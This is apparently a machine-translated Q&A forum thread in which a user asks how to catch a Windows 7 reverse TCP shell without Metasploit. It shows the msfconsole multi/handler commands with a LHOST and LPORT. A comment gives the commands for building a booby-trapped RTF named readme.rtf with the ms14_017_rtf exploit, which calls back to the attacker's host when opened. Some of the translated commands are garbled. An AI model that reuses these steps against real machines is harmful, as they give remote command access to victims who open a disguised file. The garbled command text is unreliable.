0
对不起,我的英语。 使用metasploit我为windows 7/windows/shell/reverse_tcp负载生成了漏洞利用。 后来我等待连接使用msfconsole:独立多/处理程序reverse_tcp
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit
我成功地连接到命令窗口的线。 但是我需要期待连接而不使用metasploit。我发现了如何创建独立模块,但它仅用于利用。 我需要standalone multi/handler reverse_tcp或简单的代码来监听某个端口,然后访问命令行。
感谢您的回复。我早些时候尝试过nc。连接已设置。但我无法发送命令(目录或其他)。我在服务器上键入dir(其中运行nc),但什么都不发生。 – tiigg
你用什么命令来生成shellcode? –
'使用利用/窗/ FILEFORMAT/ms14_017_rtf'
'设置有效载荷窗户/壳/ reverse_tcp'
'设置文件名readme.rtf'
'设置lhost 192.168.182.129'
'利用'
它生成带有反向tcp负载的rtf文件。然后我在Windows上运行这个文件。而Windows应该连接服务器。 – tiigg